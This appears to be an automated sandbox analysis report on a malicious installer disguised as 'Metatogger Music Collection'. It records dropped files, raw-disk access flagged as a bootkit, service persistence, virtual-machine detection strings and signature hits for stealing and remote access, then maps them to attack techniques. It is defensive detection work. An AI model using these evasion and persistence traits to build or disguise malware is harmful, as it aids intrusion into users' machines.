        Source: is-6VPG9.tmp.1.dr | Static PE information: section name: /4
        Source: is-OSHRA.tmp.1.dr | Static PE information: section name: /4
        Source: WWAN_MobileFixup 2.33.197.66.exe.3.dr | Static PE information: section name: _char2_
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406518 push 00406555h; ret 0_2_0040654D
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00408028 push ecx; mov dword ptr [esp], eax 0_2_0040802D
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004040B5 push eax; ret 0_2_004040F1
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404185 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404206 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040C218 push eax; ret 0_2_0040C219
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404283 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00408E5C push 00408E8Fh; ret 0_2_00408E87
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_004098B4 push 004098F1h; ret 1_2_004098E9
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_0047E194 push 0047E272h; ret 1_2_0047E26A
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_0045C1BC push ecx; mov dword ptr [esp], eax 1_2_0045C1C1
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_004062CC push ecx; mov dword ptr [esp], eax 1_2_004062CD
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_00410640 push ecx; mov dword ptr [esp], edx 1_2_00410645
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_0040A6C8 push esp; retf 1_2_0040A6D1
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_00430700 push ecx; mov dword ptr [esp], eax 1_2_00430705
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_00412898 push 004128FBh; ret 1_2_004128F3
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_00442CD4 push ecx; mov dword ptr [esp], ecx 1_2_00442CD8
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_00450C80 push 00450CB3h; ret 1_2_00450CAB
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_00472D24 push ecx; mov dword ptr [esp], edx 1_2_00472D25
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_0040CF98 push ecx; mov dword ptr [esp], edx 1_2_0040CF9A
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_0040546D push eax; ret 1_2_004054A9
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_0040F4F8 push ecx; mov dword ptr [esp], edx 1_2_0040F4FA
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_0040553D push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_004055BE push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_0040563B push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_004576DC push 00457720h; ret 1_2_00457718
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_0047F7E8 push ecx; mov dword ptr [esp], ecx 1_2_0047F7ED
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_00419B98 push ecx; mov dword ptr [esp], ecx 1_2_00419B9D
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | Code function: 1_2_00455E70 push 00455EA8h; ret 1_2_00455EA0
        Source: metatoggermusiccollection.exe.1.dr | Static PE information: section name: .text entropy: 7.660185314454046
        Source: WWAN_MobileFixup 2.33.197.66.exe.3.dr | Static PE information: section name: .text entropy: 7.660185314454046

        Persistence and Installation Behavior

        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0 3_2_00401A4F
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0 4_2_00401A4F
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0 4_2_02ADF7D6
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Metatogger Music Collection\is-JTEEN.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Metatogger Music Collection\libgcc_s_dw2-1.dll (copy)
        Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_RegDLL.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Metatogger Music Collection\is-7CP2O.tmp
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | File created: C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exe
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Metatogger Music Collection\libwinpthread-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_isdecmp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_setup64.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Metatogger Music Collection\libvorbis-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Metatogger Music Collection\is-OSHRA.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Metatogger Music Collection\is-6VPG9.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Metatogger Music Collection\unins000.exe (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Metatogger Music Collection\is-B2M6R.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Metatogger Music Collection\libogg-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Metatogger Music Collection\is-QO8P8.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_iscrypt.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_shfoldr.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Metatogger Music Collection\is-2EOVT.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Metatogger Music Collection\libbz2-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | File created: C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exe

        Boot Survival

        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive03_2_00401A4F
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0 4_2_00401A4F
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0 4_2_02ADF7D6
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 3_2_00402345 StartServiceCtrlDispatcherA,3_2_00402345
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00423B7C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423B7C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00423B7C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423B7C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_0042414C IsIconic,SetActiveWindow,SetFocus,1_2_0042414C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00424104 IsIconic,SetActiveWindow,1_2_00424104
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_004182F4 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_004182F4
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_004227CC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_004227CC
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00417508 IsIconic,GetCapture,1_2_00417508
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_0047DB50 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_0047DB50
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00417C40 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417C40
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00417C3E IsIconic,SetWindowPos,1_2_00417C3E
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0044AEEC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0044AEEC
        Source: C:\Users\user\Desktop\file.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_00401B4B
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,4_2_00401B4B
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,4_2_02ADF8DA
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Window / User API: threadDelayed 5533
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Window / User API: threadDelayed 4293
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\is-JTEEN.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\libgcc_s_dw2-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_RegDLL.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\is-7CP2O.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\libwinpthread-1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_isdecmp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_setup64.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\libvorbis-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\is-OSHRA.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\is-6VPG9.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\unins000.exe (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\is-B2M6R.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\libogg-0.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_iscrypt.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\is-QO8P8.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_shfoldr.dll
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\is-2EOVT.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Metatogger Music Collection\libbz2-1.dll (copy)
        Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetSystemTime,DecisionNodes graph_0-6443
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_3-2438
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe TID: 6472 Thread sleep count: 5533 > 30
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe TID: 6472 Thread sleep time: -11066000s >= -30000s
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe TID: 6772 Thread sleep count: 85 > 30
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe TID: 6772 Thread sleep time: -5100000s >= -30000s
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe TID: 6472 Thread sleep count: 4293 > 30
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe TID: 6472 Thread sleep time: -8586000s >= -30000s
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe File opened: PhysicalDrive0
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_0047A44C FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_0047A44C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_0047077C FindFirstFileA,FindNextFileA,FindClose,1_2_0047077C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_004513E4 FindFirstFileA,GetLastError,1_2_004513E4
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_004601DC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_004601DC
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00478334 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_00478334
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00460658 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00460658
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_0045EC50 FindFirstFileA,FindNextFileA,FindClose,1_2_0045EC50
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00491EBC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00491EBC
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409A14 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409A14
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Thread delayed: delay time: 60000
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp File opened: C:\Users\user
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp File opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp File opened: C:\Users\user\AppData\Roaming
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp File opened: C:\Users\user\AppData
        Source: metatoggermusiccollection.exe, 00000004.00000002.3216869641.0000000003350000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW72&}
        Source: metatoggermusiccollection.exe, 00000004.00000002.3216869641.0000000003350000.00000004.00000020.00020000.00000000.sdmp, metatoggermusiccollection.exe, 00000004.00000002.3215694991.0000000000788000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: file.tmp, 00000001.00000002.3215818794.0000000000797000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8
        Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-6301
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe API call chain: ExitProcess graph end node graph_4-20040
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 4_2_02AF00FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,4_2_02AF00FE
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 4_2_02AF00FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,4_2_02AF00FE
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00447DC0 LoadLibraryExA,LoadLibraryA,GetProcAddress,1_2_00447DC0
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 4_2_02AD6487 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,4_2_02AD6487
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 4_2_02AE9468 SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_02AE9468
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_004734AC ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_004734AC
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_0045AEE4 GetVersion,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,AllocateAndInitializeSid,GetLastError,LocalFree,1_2_0045AEE4
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe Code function: 4_2_02AE7FAD cpuid 4_2_02AE7FAD
        Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoA,0_2_0040515C
        Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoA,0_2_004051A8
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: GetLocaleInfoA,1_2_004084D0
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: GetLocaleInfoA,1_2_0040851C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_004569D4 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_004569D4
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004026C4 GetSystemTime,0_2_004026C4
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp Code function: 1_2_00453D04 GetUserNameA,1_2_00453D04
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405C44 GetVersionExA,0_2_00405C44

        Stealing of Sensitive Information

        Source: Yara match, File source: 00000004.00000002.3216353053.00000000025B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: Process Memory Space: metatoggermusiccollection.exe PID: 6408, type: MEMORYSTR

        Remote Access Functionality

        Source: Yara match, File source: 00000004.00000002.3216353053.00000000025B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: Process Memory Space: metatoggermusiccollection.exe PID: 6408, type: MEMORYSTR
        Tactics and techniques (the number in front of a technique is the count of signatures matched for it; techniques without a number had no match):

        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
        Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
        Execution: 3 Native API; 2 Service Execution; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
        Persistence: 1 DLL Side-Loading; 4 Windows Service; 1 Bootkit; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
        Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 1 Access Token Manipulation; 4 Windows Service; 2 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
        Defense Evasion: 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 22 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 21 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 2 Process Injection; 1 Bootkit; Dynamic API Resolution
        Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
